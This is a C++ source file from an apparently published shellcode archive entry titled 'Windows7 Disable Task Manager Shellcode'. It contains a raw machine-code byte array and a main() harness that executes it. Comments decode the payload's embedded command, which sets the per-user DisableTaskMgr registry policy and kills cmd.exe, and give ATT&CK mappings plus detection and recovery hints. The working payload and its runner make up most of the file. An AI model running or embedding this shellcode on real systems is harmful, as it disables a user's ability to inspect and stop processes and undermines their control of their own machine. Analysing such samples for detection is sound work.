/*------------------------------------------------
==[ By Ayrbyte ]======[ Geng Simbe @ TKJ 1 Club ]========================================
Greets To : Adit Groundd SAndd Notte, Agos Wahyo, Aguenkk Rebel Black Sweet,
Ahmad Bagoes, Alvin Putra Marcdyto, Arieb Shezhaniea, Aviep Autiez, Chusnie Mubarok,
Cumigh Gokil On Üç, Dapat Di Hubungi, De Ayiph Ever, Dwi J Andreansyah, Jack PYing,
Khuluq Gomez, Ola Amor Arpaz, Pewe, Q-blueshiierezpector Screamoalltheway Aparatkeparat,
Raden Mas Koko, Rivan Ardiansyah, Rizqi Bogez, Rony C'Penghianat X Ciinta, Sukrex Dreizehn,
Syafi'i, and all Tkj 1 Club Family... ^_^
=========================================================================================
--------------------------------------------------
title : Windows7 Disable Task Manager Shellcode - 326 chars
Author: Ayrbyte
Category: local
Tested on: Windows7 Ultimate
Code : c++
Fb : fb.me/Ayrbyte
------------------------------------------------ */
#include <cstdio>
#include <cstdlib>
#include <iostream>
using namespace std;
/*
 * code[] - raw machine-code payload held in a writable global char array.
 *
 * Static reading (nothing has to be executed to see this): from the third
 * line of the literal onward, the 4-byte immediates that follow each \xB9
 * opcode are ASCII. Read in order they spell one command line:
 *
 *   cmd /k REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System
 *       /v DisableTaskMgr /t REG_DWORD /d 1 /f & taskkill /im cmd.exe /f
 *
 * The trailing "/f" is stored as 0x11117740 and appears to be recovered by
 * subtracting the 0x11111111 loaded into EAX by the \xB8 instruction.
 *
 * Effect of that command: it sets the per-user policy value DisableTaskMgr=1,
 * which makes Windows refuse to open Task Manager for that user. The key is
 * under HKCU, so the write itself needs no elevation. This is commonly mapped
 * to ATT&CK T1112 (Modify Registry) and T1562.001 (Disable or Modify Tools).
 *
 * Detection and recovery pointers:
 *   - process-creation telemetry with command lines (Security event 4688 or
 *     Sysmon event 1) showing reg.exe with "DisableTaskMgr";
 *   - registry value-set telemetry (Sysmon event 13) on
 *     ...\CurrentVersion\Policies\System\DisableTaskMgr;
 *   - recovery is deleting the value or setting it to 0.
 *
 * Size: the literal contains \x00 bytes; the first is at offset 326, which is
 * the "326 chars" quoted in the file header and what strlen() returns. By
 * count the literal holds 459 bytes (14 lines of 32 plus a final 11).
 *
 * NOTE(review): the opening bytes read fs:[0x30], so this presumably targets
 * 32-bit Windows processes only; how the called routine is located is not
 * documented on the page - confirm before relying on either point.
 */
char code[] = "\x33\xF6\x33\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x33\xDB\x43\x8B\x6E\x08\x8B\x7E\x20\x8B\x36\xB8\x11\x11\x11\x11\xB9\x14"
"\x11\x11\x11\x2B\xC8\x8B\xD1\x3B\xDA\x75\xE5\xB9\x73\x31\x11\x11\x2B\xC8\x03\xE9\x8B\xD4\xB9\x10\x21\x11\x11\x2B\xC8\x2B\xD1\xB9"
"\x63\x6D\x64\x20\x89\x0A\xB9\x2F\x6B\x20\x52\x89\x4A\x04\xB9\x45\x47\x20\x61\x89\x4A\x08\xB9\x64\x64\x20\x48\x89\x4A\x0C\xB9\x4B"
"\x43\x55\x5C\x89\x4A\x10\xB9\x53\x6F\x66\x74\x89\x4A\x14\xB9\x77\x61\x72\x65\x89\x4A\x18\xB9\x5C\x4D\x69\x63\x89\x4A\x1C\xB9\x72"
"\x6F\x73\x6F\x89\x4A\x20\xB9\x66\x74\x5C\x57\x89\x4A\x24\xB9\x69\x6E\x64\x6F\x89\x4A\x28\xB9\x77\x73\x5C\x43\x89\x4A\x2C\xB9\x75"
"\x72\x72\x65\x89\x4A\x30\xB9\x6E\x74\x56\x65\x89\x4A\x34\xB9\x72\x73\x69\x6F\x89\x4A\x38\xB9\x6E\x5C\x50\x6F\x89\x4A\x3C\xB9\x6C"
"\x69\x63\x69\x89\x4A\x40\xB9\x65\x73\x5C\x53\x89\x4A\x44\xB9\x79\x73\x74\x65\x89\x4A\x48\xB9\x6D\x20\x2F\x76\x89\x4A\x4C\xB9\x20"
"\x44\x69\x73\x89\x4A\x50\xB9\x61\x62\x6C\x65\x89\x4A\x54\xB9\x54\x61\x73\x6B\x89\x4A\x58\xB9\x4D\x67\x72\x20\x89\x4A\x5C\xB9\x2F"
"\x74\x20\x52\x89\x4A\x60\xB9\x45\x47\x5F\x44\x89\x4A\x64\xB9\x57\x4F\x52\x44\x89\x4A\x68\xB9\x20\x2F\x64\x20\x89\x4A\x6C\xB9\x31"
"\x20\x2F\x66\x89\x4A\x70\xB9\x20\x26\x20\x74\x89\x4A\x74\xB9\x61\x73\x6B\x6B\x89\x4A\x78\xB9\x69\x6C\x6C\x20\x89\x4A\x7C\xB9\x2F"
"\x69\x6D\x20\x89\x8A\x80\x00\x00\x00\xB9\x63\x6D\x64\x2E\x89\x8A\x84\x00\x00\x00\xB9\x65\x78\x65\x20\x89\x8A\x88\x00\x00\x00\xB9"
"\x40\x77\x11\x11\x2B\xC8\x89\x8A\x8C\x00\x00\x00\x33\xDB\x8B\xF4\xB9\x65\x11\x11\x11\x2B\xC8\x8D\x4E\xAC\x51\x8D\x4E\xBC\x51\x53"
"\x53\xB9\x31\x13\x11\x11\x2B\xC8\x51\x53\x53\x53\x52\x53\xFF\xD5\x33\xF6\x33\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x33\xDB"
"\x43\x8B\x6E\x08\x8B\x7E\x20\x8B\x36\xB8\x11\x11\x11\x11\xB9\x13\x11\x11\x11\x2B\xC8\x8B\xD1\x3B\xDA\x75\xE5\xB8\x11\x11\x11\x11"
"\xB9\x37\x26\x14\x11\x2B\xC8\x03\xE9\xFF\xD5";
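// Harness for the code[] byte array: prints the array's size, waits at a
// PAUSE prompt, then calls the array as if it were a function.
//
// Length reporting: code[] contains \x00 bytes (the first sits at offset 326),
// so strlen() stops there and under-reports the payload. sizeof(code) - 1
// counts every byte of the literal, excluding only the terminator the compiler
// appends. The cast keeps the argument type matched to the %u conversion.
//
// Execution: the last statement casts a writable data array to a function
// pointer and calls it. With DEP/NX enforced for the process this call is
// expected to raise an access violation, because the array lives in data
// memory that is not marked executable. The ASCII embedded in code[] spells a
// "REG add ... DisableTaskMgr" command, so where the call does run it changes
// a per-user registry policy value.
int main(){
    const unsigned int payload_len = static_cast<unsigned int>(sizeof(code) - 1);
    printf("Shellcode Length is : %u\n", payload_len);
    system("PAUSE");
    // Transfers control to the bytes in code[]; whether it returns is not
    // visible from this file.
    int (*_13)() = (int(*)())code; _13(); }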
/*=================[ Geng Simbe @ TKJ 1 Club ]======*/
//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Neither Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information.